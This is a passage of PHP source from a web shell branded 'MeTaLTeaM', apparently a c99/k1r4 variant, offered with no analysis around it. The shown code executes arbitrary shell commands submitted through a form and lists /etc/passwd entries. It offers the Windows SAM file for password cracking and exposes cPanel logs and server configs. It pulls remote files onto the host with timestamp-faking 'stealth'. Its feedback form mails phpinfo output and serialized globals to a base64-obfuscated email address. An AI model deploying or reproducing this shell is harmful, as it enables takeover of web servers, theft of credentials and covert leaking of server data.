1474 }
1475}
1476if ($act == "d")
1477{
1478 if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";}
1479 else
1480 {
1481 echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>";
1482 if (!$win)
1483 {
1484 echo "<tr><td><b>Owner/Group</b></td><td> ";
1485 $ow = posix_getpwuid(fileowner($d));
1486 $gr = posix_getgrgid(filegroup($d));
1487 $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
1488 }
1489 echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>";
1490 }
1491}
1492if ($act == "phpinfo") {@ob_clean(); phpinfo(); k1r4exit();}
1493if ($act == "security")
1494{
1495 echo "<center><b>Server security information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>";
1496 if (!$win)
1497 {
1498 if ($nixpasswd)
1499 {
1500 if ($nixpasswd == 1) {$nixpasswd = 0;}
1501 echo "<b>*nix /etc/passwd:</b><br>";
1502 if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;}
1503 if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;}
1504 echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>";
1505 $i = $nixpwd_s;
1506 while ($i < $nixpwd_e)
1507 {
1508 $uid = posix_getpwuid($i);
1509 if ($uid)
1510 {
1511 $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>";
1512 echo join(":",$uid)."<br>";
1513 }
1514 $i++;
1515 }
1516 }
1517 else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";}
1518 }
1519 else
1520 {
1521 $v = $_SERVER["WINDIR"]."\repair\sam";
1522 if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";}
1523 else {echo "<b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ©.</font></b><br>";}
1524 }
1525 if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}
1526 if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";}
1527 if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
1528 if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
1529 if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";}
1530 if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u><b>Message Of The Day</b></u></a></font></b><br>";}
1531 if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";}
1532 function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}}
1533 displaysecinfo("OS Version?",myshellexec("cat /proc/version"));
1534 displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version"));
1535 displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net"));
1536 displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise"));
1537 displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo"));
1538 displaysecinfo("RAM",myshellexec("free -m"));
1539 displaysecinfo("HDD space",myshellexec("df -h"));
1540 displaysecinfo("List of Attributes",myshellexec("lsattr -a"));
1541 displaysecinfo("Mount options ",myshellexec("cat /etc/fstab"));
1542 displaysecinfo("Is cURL installed?",myshellexec("which curl"));
1543 displaysecinfo("Is lynx installed?",myshellexec("which lynx"));
1544 displaysecinfo("Is links installed?",myshellexec("which links"));
1545 displaysecinfo("Is fetch installed?",myshellexec("which fetch"));
1546 displaysecinfo("Is GET installed?",myshellexec("which GET"));
1547 displaysecinfo("Is perl installed?",myshellexec("which perl"));
1548 displaysecinfo("Where is apache",myshellexec("whereis apache"));
1549 displaysecinfo("Where is perl?",myshellexec("whereis perl"));
1550 displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf"));
1551 displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf"));
1552 displaysecinfo("locate my.conf",myshellexec("locate my.conf"));
1553 displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf"));
1554}
1555if ($act == "mkfile")
1556{
1557 if ($mkfile != $d)
1558 {
1559 if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";}
1560 elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";}
1561 else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);}
1562 }
1563 else {$act = $dspact = "ls";}
1564}
1565if ($act == "encoder")
1566{
1567 echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><center><b>Encoder:</b></center><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><center><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br></center><b>Hashes</b>:<br><center>";
1568 foreach(array("md5","crypt","sha1","crc32") as $v)
1569 {
1570 echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>";
1571 }
1572 echo "</center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly>
1573 <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly>
1574 <br></center><b>Base64:</b><center>base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></center>";
1575 echo "<center>base64_decode - ";
1576 if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";}
1577 else
1578 {
1579 $debase64 = base64_decode($encoder_input);
1580 $debase64 = str_replace("\0","[0]",$debase64);
1581 $a = explode("\r\n",$debase64);
1582 $rows = count($a);
1583 $debase64 = htmlspecialchars($debase64);
1584 if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";}
1585 else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";}
1586 echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b>^</b></a>";
1587 }
1588 echo "</center><br><b>Base convertations</b>:<center>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"";
1589 $c = strlen($encoder_input);
1590 for($i=0;$i<$c;$i++)
1591 {
1592 $hex = dechex(ord($encoder_input[$i]));
1593 if ($encoder_input[$i] == "&") {echo $encoder_input[$i];}
1594 elseif ($encoder_input[$i] != "\\") {echo "%".$hex;}
1595 }
1596 echo "\" readonly><br></center></form>";
1597}
1598if ($act == "fsbuff")
1599{
1600 $arr_copy = $sess_data["copy"];
1601 $arr_cut = $sess_data["cut"];
1602 $arr = array_merge($arr_copy,$arr_cut);
1603 if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";}
1604 else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";}
1605}
1606if ($act == "selfremove")
1607{
1608 if (($submit == $rndcode) and ($submit != ""))
1609 {
1610 if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using MeTaLTeaM".$shver."!"; k1r4exit(); }
1611 else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
1612 }
1613 else
1614 {
1615 if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";}
1616 $rnd = rand(0,9).rand(0,9).rand(0,9);
1617 echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>";
1618 }
1619}
1620if ($act == "update") {$ret = k1r4_getupdate(!!$confirmupdate); echo "<b>".$ret."</b>"; if (stristr($ret,"new version")) {echo "<br><br><input type=button onclick=\"location.href='".$surl."act=update&confirmupdate=1';\" value=\"Update now\">";}}
1621if ($act == "feedback")
1622{
1623 $suppmail = base64_decode("ZnJlZXNoZWxsNTEwQGdtYWlsLmNvbQ==");
1624 if (!empty($submit))
1625 {
1626 $ticket = substr(md5(microtime()+rand(1,1000)),0,6);
1627 $body = "MeTaLTeaM".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR;
1628 if (!empty($fdbk_ref))
1629 {
1630 $tmp = @ob_get_contents();
1631 ob_clean();
1632 phpinfo();
1633 $phpinfo = base64_encode(ob_get_contents());
1634 ob_clean();
1635 echo $tmp;
1636 $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n";
1637 }
1638 mail($suppmail,"MeTaLTeaM".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail);
1639 echo "<center><b>Thanks for your feedback! Your ticket ID: ".$ticket.".</b></center>";
1640 }
1641 else {echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=feedback><b>Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):<br><br>Your name: <input type=\"text\" name=\"fdbk_name\" value=\"".htmlspecialchars($fdbk_name)."\"><br><br>Your e-mail: <input type=\"text\" name=\"fdbk_email\" value=\"".htmlspecialchars($fdbk_email)."\"><br><br>Message:<br><textarea name=\"fdbk_body\" cols=80 rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\" name=\"fdbk_ref\" value=\"".urlencode($HTTP_REFERER)."\"><br><br>Attach server-info * <input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked><br><br>There are no checking in the form.<br><br>* - strongly recommended, if you report bug, because we need it for bug-fix.<br><br>We understand languages: English, Russian.<br><br><input type=\"submit\" name=\"submit\" value=\"Send\"></form>";}
1642}
1643if ($act == "search")
1644{
1645 echo "<b>Search in file-system:</b><br>";
1646 if (empty($search_in)) {$search_in = $d;}
1647 if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
1648 if (empty($search_text_wwo)) {$search_text_regexp = 0;}
1649 if (!empty($submit))
1650 {
1651 $found = array();
1652 $found_d = 0;
1653 $found_f = 0;
1654 $search_i_f = 0;
1655 $search_i_d = 0;
1656 $a = array
1657 (
1658 "name"=>$search_name, "name_regexp"=>$search_name_regexp,
1659 "text"=>$search_text, "text_regexp"=>$search_text_regxp,
1660 "text_wwo"=>$search_text_wwo,
1661 "text_cs"=>$search_text_cs,
1662 "text_not"=>$search_text_not
1663 );
1664 $searchtime = getmicrotime();
1665 $in = array_unique(explode(";",$search_in));
1666 foreach($in as $v) {k1r4fsearch($v);}
1667 $searchtime = round(getmicrotime()-$searchtime,4);
1668 if (count($found) == 0) {echo "<b>No files found!</b>";}
1669 else
1670 {
1671 $ls_arr = $found;
1672 $disp_fullpath = TRUE;
1673 $act = "ls";
1674 }
1675 }
1676 echo "<form method=POST>
1677<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\">
1678<b>Search for (file/folder name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp
1679<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\">
1680<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea>
1681<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp
1682&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only
1683&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive
1684&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text
1685<br><br><input type=submit name=submit value=\"Search\"></form>";
1686 if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";}
1687}
1688if ($act == "chmod")
1689{
1690 $mode = fileperms($d.$f);
1691 if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
1692 else
1693 {
1694 $form = TRUE;
1695 if ($chmod_submit)
1696 {
1697 $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
1698 if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";}
1699 else {$err = "Can't chmod to ".$octet.".";}
1700 }
1701 if ($form)
1702 {
1703 $perms = parse_perms($mode);
1704 echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";
1705 }
1706 }
1707}
1708if ($act == "upload")
1709{
1710 $uploadmess = "";
1711 $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath);
1712 if (empty($uploadpath)) {$uploadpath = $d;}
1713 elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";}
1714 if (!empty($submit))
1715 {
1716 global $HTTP_POST_FILES;
1717 $uploadfile = $HTTP_POST_FILES["uploadfile"];
1718 if (!empty($uploadfile["tmp_name"]))
1719 {
1720 if (empty($uploadfilename)) {$destin = $uploadfile["name"];}
1721 else {$destin = $userfilename;}
1722 if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";}
1723 }
1724 elseif (!empty($uploadurl))
1725 {
1726 if (!empty($uploadfilename)) {$destin = $uploadfilename;}
1727 else
1728 {
1729 $destin = explode("/",$destin);
1730 $destin = $destin[count($destin)-1];
1731 if (empty($destin))
1732 {
1733 $i = 0;
1734 $b = "";
1735 while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}}
1736 }
1737 if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";}
1738 else
1739 {
1740 $st = getmicrotime();
1741 $content = @file_get_contents($uploadurl);
1742 $dt = round(getmicrotime()-$st,4);
1743 if (!$content) {$uploadmess .= "Can't download file!<br>";}
1744 else
1745 {
1746 if ($filestealth) {$stat = stat($uploadpath.$destin);}
1747 $fp = fopen($uploadpath.$destin,"w");
1748 if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";}
1749 else
1750 {
1751 fwrite($fp,$content,strlen($content));
1752 fclose($fp);
1753 if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
1754 }
1755 }
1756 }
1757 }
1758 }
1759 if ($miniform)
1760 {
1761 echo "<b>".$uploadmess."</b>";
1762 $act = "ls";
1763 }
1764 else
1765 {
1766 echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST>
1767Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br>
1768Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br>
1769Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br>
1770File-name (auto-fill): <input name=uploadfilename size=25><br><br>
1771<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br>
1772<input type=submit name=submit value=\"Upload\">
1773</form>";
1774 }
1775}
1776if ($act == "delete")
1777{
1778 $delerr = "";
1779 foreach ($actbox as $v)
1780 {
1781 $result = FALSE;
1782 $result = fs_rmobj($v);
1783 if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";}
1784 }
1785 if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}
1786 $act = "ls";
1787}
1788if (!$usefsbuff)
1789{
1790 if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.</center>";}
1791}
1792else
1793{
1794 if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); k1r4_sess_put($sess_data); $act = "ls"; }
1795 elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); k1r4_sess_put($sess_data); $act = "ls";}
1796 elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} k1r4_sess_put($sess_data); $act = "ls";}
1797 if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); k1r4_sess_put($sess_data);}
1798 elseif ($actpastebuff)
1799 {
1800 $psterr = "";
1801 foreach($sess_data["copy"] as $k=>$v)
1802 {
1803 $to = $d.basename($v);
1804 if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
1805 if ($copy_unset) {unset($sess_data["copy"][$k]);}
1806 }
1807 foreach($sess_data["cut"] as $k=>$v)
1808 {
1809 $to = $d.basename($v);
1810 if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
1811 unset($sess_data["cut"][$k]);
1812 }
1813 k1r4_sess_put($sess_data);
1814 if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
1815 $act = "ls";
1816 }
1817 elseif ($actarcbuff)
1818 {
1819 $arcerr = "";
1820 if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
1821 else {$ext = ".tar.gz";}
1822 if ($ext == ".tar.gz") {$cmdline = "tar cfzv";}
1823 $cmdline .= " ".$actarcbuff_path;
1824 $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
1825 foreach($objects as $v)
1826 {
1827 $v = str_replace("\\",DIRECTORY_SEPARATOR,$v);
1828 if (substr($v,0,strlen($d)) == $d) {$v = basename($v);}
1829 if (is_dir($v))
1830 {
1831 if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;}
1832 $v .= "*";
1833 }
1834 $cmdline .= " ".$v;
1835 }
1836 $tmp = realpath(".");
1837 chdir($d);
1838 $ret = myshellexec($cmdline);
1839 chdir($tmp);
1840 if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";}
1841 $ret = str_replace("\r\n","\n",$ret);
1842 $ret = explode("\n",$ret);
1843 if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
1844 foreach($sess_data["cut"] as $k=>$v)
1845 {
1846 if (in_array($v,$ret)) {fs_rmobj($v);}
1847 unset($sess_data["cut"][$k]);
1848 }
1849 k1r4_sess_put($sess_data);
1850 if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
1851 $act = "ls";
1852 }
1853 elseif ($actpastebuff)
1854 {
1855 $psterr = "";
1856 foreach($sess_data["copy"] as $k=>$v)
1857 {
1858 $to = $d.basename($v);
1859 if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
1860 if ($copy_unset) {unset($sess_data["copy"][$k]);}
1861 }
1862 foreach($sess_data["cut"] as $k=>$v)
1863 {
1864 $to = $d.basename($v);
1865 if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
1866 unset($sess_data["cut"][$k]);
1867 }
1868 k1r4_sess_put($sess_data);
1869 if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
1870 $act = "ls";
1871 }
1872}
1873if ($act == "cmd")
1874{
1875if (trim($cmd) == "ps -aux") {$act = "processes";}
1876elseif (trim($cmd) == "tasklist") {$act = "processes";}
1877else
1878{
1879 @chdir($chdir);
1880 if (!empty($submit))
1881 {
1882 echo "<b>Result of execution this command</b>:<br>";
1883 $olddir = realpath(".");
1884 @chdir($d);
1885 $ret = myshellexec($cmd);
1886 $ret = convert_cyr_string($ret,"d","w");
1887 if ($cmd_txt)
1888 {
1889 $rows = count(explode("\r\n",$ret))+1;
1890 if ($rows < 10) {$rows = 10;}
1891 echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
1892 }
1893 else {echo $ret."<br>";}
1894 @chdir($olddir);
1895 }
1896 else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}}
1897 echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>";
1898}
1899}
1900if ($act == "ls")
1901{
1902 if (count($ls_arr) > 0) {$list = $ls_arr;}
1903 else
1904 {
1905 $list = array();
1906 if ($h = @opendir($d))
1907 {
1908 while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;}
1909 closedir($h);
1910 }
1911 else {}
1912 }
1913 if (count($list) == 0) {echo "<center><b>Can't open folder (".htmlspecialchars($d).")!</b></center>";}
1914 else
1915 {
1916 //Building array
1917 $objects = array();
1918 $vd = "f"; //Viewing mode
1919 if ($vd == "f")
1920 {
1921 $objects["head"] = array();
1922 $objects["folders"] = array();
1923 $objects["links"] = array();
1924 $objects["files"] = array();
1925 foreach ($list as $v)
1926 {
1927 $o = basename($v);
1928 $row = array();
1929 if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";}
1930 elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";}
1931 elseif (is_dir($v))
1932 {
1933 if (is_link($v)) {$type = "LINK";}
1934 else {$type = "DIR";}
1935 $row[] = $v;
1936 $row[] = $type;
1937 }
1938 elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);}
1939 $row[] = filemtime($v);
1940 if (!$win)
1941 {
1942 $ow = posix_getpwuid(fileowner($v));
1943 $gr = posix_getgrgid(filegroup($v));
1944 $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));
1945 }
1946 $row[] = fileperms($v);
1947 if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
1948 elseif (is_link($v)) {$objects["links"][] = $row;}
1949 elseif (is_dir($v)) {$objects["folders"][] = $row;}
1950 elseif (is_file($v)) {$objects["files"][] = $row;}
1951 $i++;
1952 }
1953 $row = array();
1954 $row[] = "<b>Name</b>";
1955 $row[] = "<b>Size</b>";
1956 $row[] = "<b>Modify</b>";
1957 if (!$win)
1958 {$row[] = "<b>Owner/Group</b>";}
1959 $row[] = "<b>Perms</b>";
1960 $row[] = "<b>Action</b>";
1961 $parsesort = parsesort($sort);
1962 $sort = $parsesort[0].$parsesort[1];
1963 $k = $parsesort[0];
1964 if ($parsesort[1] != "a") {$parsesort[1] = "d";}
1965 $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">";
1966 $y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($parsesort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>";
1967 $row[$k] .= $y;
1968 for($i=0;$i<count($row)-1;$i++)
1969 {
1970 if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";}
1971 }
1972 $v = $parsesort[0];
1973 usort($objects["folders"], "tabsort");
1974 usort($objects["links"], "tabsort");
1975 usort($objects["files"], "tabsort");
1976 if ($parsesort[1] == "d")
1977 {
1978 $objects["folders"] = array_reverse($objects["folders"]);
1979 $objects["files"] = array_reverse($objects["files"]);
1980 }
1981 $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);
1982 $tab = array();
1983 $tab["cols"] = array($row);
1984 $tab["head"] = array();
1985 $tab["folders"] = array();
1986 $tab["links"] = array();
1987 $tab["files"] = array();
1988 $i = 0;
1989 foreach ($objects as $a)
1990 {
1991 $v = $a[0];
1992 $o = basename($v);
1993 $dir = dirname($v);
1994 if ($disp_fullpath) {$disppath = $v;}
1995 else {$disppath = $o;}
1996 $disppath = str2mini($disppath,60);
1997 if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
1998 elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
